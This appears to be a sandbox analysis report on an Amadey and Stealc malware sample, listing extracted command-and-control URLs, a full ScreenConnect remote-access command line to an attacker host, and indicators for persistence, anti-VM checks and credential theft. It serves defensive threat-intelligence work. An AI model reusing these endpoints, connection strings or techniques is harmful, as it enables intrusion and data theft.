amadey | 4c165fe75aadc4ad7cb2800641f52ed55a8e50b80445c88660e0d8cbc306c778

Analysis

max time kernel
142s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d3053f42c2c51006ff8ae62525ef2221.exe
Size

5.4MB
MD5

d3053f42c2c51006ff8ae62525ef2221
SHA1

9049789457f3c8239be6f9d1c143f5d1f385ba89
SHA256

4c165fe75aadc4ad7cb2800641f52ed55a8e50b80445c88660e0d8cbc306c778
SHA512

0b894087a49fb6d9007ee5d76077587c04f2a7826123019301870b281d143c63b8e6a78ef6e3cf084a9e64da01f6bae96a9221395f523454afabe66c5833c298
SSDEEP

98304:vGSKk20HutmezO2hDSuKWU0b30qYs7mAMReFa6CPg6pkoMm5iGQQV/azW:Otkramez1DSuJZbzYSmyBCrpkvKaa

Score

10^/10

amadey stealc 092155 trump defense_evasion discovery execution exploit persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4292 created 2628	4292	Exam.com	44
PID 5924 created 2628	5924	Exam.com	44

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2z6609.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3g52f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	eaaa0a3e14.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1W48q9.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 6 IoCs

flow	pid	Process
34	4780	rapes.exe
66	4780	rapes.exe
66	4780	rapes.exe
66	4780	rapes.exe
36	4780	rapes.exe
62	4780	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3088	takeown.exe
4336	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=56dfd8ab-0f5e-462c-ad0c-711d09e4754c&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA7WQr%2b6%2fQ80mEqwztTBbh1AAAAAACAAAAAAAQZgAAAAEAACAAAACOFl7OgOdI0rmI4ts2FG7ZT27cg46jBvmQT3SbjGbXdQAAAAAOgAAAAAIAACAAAAB52frOBBNgMhzAEwVuLg%2bt%2bjzm%2bmKrLfzZVN%2fNesIPMKAEAADBoIbRlM87GXNUvGO1YrHX1VxNLj6CzQiE15A1JW5jkxKeJrEVSZiEoMaDb6tynA%2bd17b8Gx9IQ%2b2SHGIow%2b68v5QHm2x6qb5Byi3kIsAaG9OsaycbhISkkuSw2fVSRzY9hs70%2bBtSe%2fbt%2fCcedATnEvxfR1Lg7sBNBfUGPk1WONQ%2fzxdDTCOHLHn6wqcvP28EX49NHZxpHMYwC3aylv7GfkQBJZYzUNGeZa8oI0NbsbMOStqZete4VSbQ2s4pgqs0sMU5JDaPdzZ5jYS%2f8jSXkMkc1aB0bcQvDnWAPLY2CJLixbcawJXXm0mB6oc8TVzcSbAh7Ucqdedxi4sAOmpeU3M1JvbI7izIFzMeXQXxYtXJ%2bdqnYeB1smtRl4fTSZX%2fVSJAjMPWy82EUk9gJzC0W0fgK2a3a1iU9FFQeFev8lKXMNMh6E%2bOXX66s4rbKoOkm%2b6zJj8YUpJ9AKvjsGlGxVOn1jzJt3u0kJ%2f%2fSsKQ3II4ehPWe090Udu339Uuup%2fVX4S6GH86dap33Yl8fAvrPe7beDLQ3WJqP5TSThl0fJ46Cjw7HF4aSKmL%2b5wCLfCgkEc%2bR1BAdV%2b8aHdlTmCaloWKJ0lOdd12nDtSOpF9%2fKl8QUri8gjIGZPWJo0vX5VQjEHQSwGjLqT2tKw%2bpkwNU1AuE0JwEv561Ahm0I4HcRSIlZ3DP1%2blJ0HB9JCQB%2fQIe%2fm0jyKNvYpDnBMv3UEe5kTO5%2fk%2b7IIZV5awvJqNsTkJjLh6DBXkhycAQtxzuddvrv3yL5iTMOJbkZZAVYiMzX39sS9Nv2q8b7%2flywyIfBVro%2byrAMlSTDYIdQ6lPm4iIR466x5IMBMj8tmOuWKEgC8Rmn8Z9c8IJ%2bh4hORuaMl518ossJJ32ugvbhKfffTRXMqvrqruiM0hahltfmZT3AKnH%2f5IZo2F1qY5AnCz0Z5jcFx3LirJoiBrCkSupPhvFzG9SzU9JTq1T7FRwy8faepOP9W1w1hiiY9%2bDMra%2fe66mUFxErvrXPgsiRhYU23yTzDUXWkpep%2fnEbqxzlCN7n%2b1drfy29hiaBctL1bHqT5xgZt5omiu7CoRKBO%2by2v59PRYMzrYya9kRNAIn954yrFIprSiUG27KFUgL2EcGRN3vB1y4rU2afTUFAwTd4LevOgmLyL50q24T0Crfzm16ww6KO%2fgu1pfjGshoNmJdYmp2pVWYoBKdvPoGd5BIfSC%2bcx3hWGy115au9DP%2fbl4y0UfwyB5t%2fJzsc1vnQc%2bK6f%2f25ePhocCf2HiNVJAAxkAzl1c%2fD6MUxereho12yUNbL8qa%2fsCgrkYJf69ayk6kQuVZO3n431Lc6mRvVnFmVE1DF5r%2bSiMP3sgh2zWyMEhefL9JfCURzZrlgPYo1b4Aq%2f6yBYyqE32WclxjDiKx1BxJs8cSXrrPQ9HSfmqr9z22JDcJPEigHu3bAg1txt7BuVGiQmvQI%2bgOW49yF%2bsH3zHkpBN4O2nAZhsbHI%2fhe7bjgf9BKQCjZamrBZuVbPUcPtq%2fz3gb5Fd0SJsH6JuPpa00ri5DTZSGNWisk1pBd6Skd9A660yHcHAiIp9rhYVakAAAAAfVeDFAo3iozhmuG6SXXJ9sfT8Y%2fha7xsNX512UFhLzgSJwViXrFko9P2RvcAsUXjbwWiJzYUx1jTxZZmU90oR&t=purchased\""	ScreenConnect.ClientService.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3g52f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	eaaa0a3e14.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1W48q9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2z6609.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3g52f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	eaaa0a3e14.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2z6609.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1W48q9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	TbV75ZR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	tool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	WLbfHbp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation	1W48q9.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 21 IoCs

pid	Process
232	A0v32.exe
5476	1W48q9.exe
4780	rapes.exe
4792	2z6609.exe
4852	3g52f.exe
3492	rapes.exe
2280	TbV75ZR.exe
3320	eaaa0a3e14.exe
4292	Exam.com
5476	tool.exe
3432	WLbfHbp.exe
3212	BIm18E9.exe
1468	apple.exe
2328	11.exe
5232	11.exe
3528	ScreenConnect.ClientService.exe
832	ScreenConnect.WindowsClient.exe
3428	ScreenConnect.WindowsClient.exe
5924	Exam.com
5768	rapes.exe
2524	rapes.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	3g52f.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	eaaa0a3e14.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	1W48q9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine	2z6609.exe

Loads dropped DLL 22 IoCs

pid	Process
700	MsiExec.exe
5600	rundll32.exe
5600	rundll32.exe
5600	rundll32.exe
5600	rundll32.exe
5600	rundll32.exe
5600	rundll32.exe
5600	rundll32.exe
5600	rundll32.exe
5600	rundll32.exe
4904	MsiExec.exe
1060	MsiExec.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe
3528	ScreenConnect.ClientService.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3088	takeown.exe
4336	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	d3053f42c2c51006ff8ae62525ef2221.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	A0v32.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

persistence privilege_escalation

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\cln14smm.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\cln14smm.newcfg	ScreenConnect.ClientService.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
5868	tasklist.exe
3284	tasklist.exe
3752	tasklist.exe
3148	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
5476	1W48q9.exe
4780	rapes.exe
4792	2z6609.exe
4852	3g52f.exe
3492	rapes.exe
3320	eaaa0a3e14.exe
5768	rapes.exe
2524	rapes.exe

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\Client.Override.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe

Drops file in Windows directory 32 IoCs

description	ioc	Process
File opened for modification	C:\Windows\MandateFlashing	TbV75ZR.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\IstRepresentative	WLbfHbp.exe
File created	C:\Windows\Installer\e57ff8e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2DB.tmp	msiexec.exe
File opened for modification	C:\Windows\ThoseTransit	TbV75ZR.exe
File opened for modification	C:\Windows\MandateFlashing	WLbfHbp.exe
File opened for modification	C:\Windows\ThinksMartin	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\MSIB7.tmp	msiexec.exe
File created	C:\Windows\Installer\e57ff90.msi	msiexec.exe
File opened for modification	C:\Windows\VeryBulk	TbV75ZR.exe
File opened for modification	C:\Windows\IstRepresentative	TbV75ZR.exe
File opened for modification	C:\Windows\DollStriking	TbV75ZR.exe
File opened for modification	C:\Windows\ThoseTransit	WLbfHbp.exe
File opened for modification	C:\Windows\DollStriking	WLbfHbp.exe
File opened for modification	C:\Windows\Installer\e57ff8e.msi	msiexec.exe
File opened for modification	C:\Windows\AdministratorNhs	TbV75ZR.exe
File opened for modification	C:\Windows\VeryBulk	WLbfHbp.exe
File opened for modification	C:\Windows\FinancingPortable	WLbfHbp.exe
File opened for modification	C:\Windows\SinghCooling	WLbfHbp.exe
File created	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	1W48q9.exe
File opened for modification	C:\Windows\ThinksMartin	TbV75ZR.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\{F2D9E338-36BD-B769-CD92-1C2995F4239A}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\SinghCooling	TbV75ZR.exe
File opened for modification	C:\Windows\AdministratorNhs	WLbfHbp.exe
File created	C:\Windows\Installer\SourceHash{F2D9E338-36BD-B769-CD92-1C2995F4239A}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE6.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{F2D9E338-36BD-B769-CD92-1C2995F4239A}.SchedServiceConfig.rmi	MsiExec.exe
File opened for modification	C:\Windows\FinancingPortable	TbV75ZR.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1544	sc.exe
1984	sc.exe
5512	sc.exe
2180	sc.exe
5420	sc.exe
4408	sc.exe
3096	sc.exe
4092	sc.exe
1928	sc.exe
4532	sc.exe
4864	sc.exe
2640	sc.exe
3380	sc.exe
3336	sc.exe
1292	sc.exe
4400	sc.exe
5660	sc.exe
5916	sc.exe
1396	sc.exe
4708	sc.exe
3648	sc.exe
6108	sc.exe
1916	sc.exe
5652	sc.exe
3180	sc.exe
880	sc.exe
2496	sc.exe
1556	sc.exe
716	sc.exe
5648	sc.exe
1344	sc.exe
5116	sc.exe
868	sc.exe
436	sc.exe
2596	sc.exe
1396	sc.exe
4656	sc.exe
4756	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
5420	4292	WerFault.exe	114
2180	5924	WerFault.exe	221

System Location Discovery: System Language Discovery 1 TTPs 46 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exam.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3g52f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TbV75ZR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WLbfHbp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BIm18E9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A0v32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d3053f42c2c51006ff8ae62525ef2221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1W48q9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2z6609.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tool.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eaaa0a3e14.exe
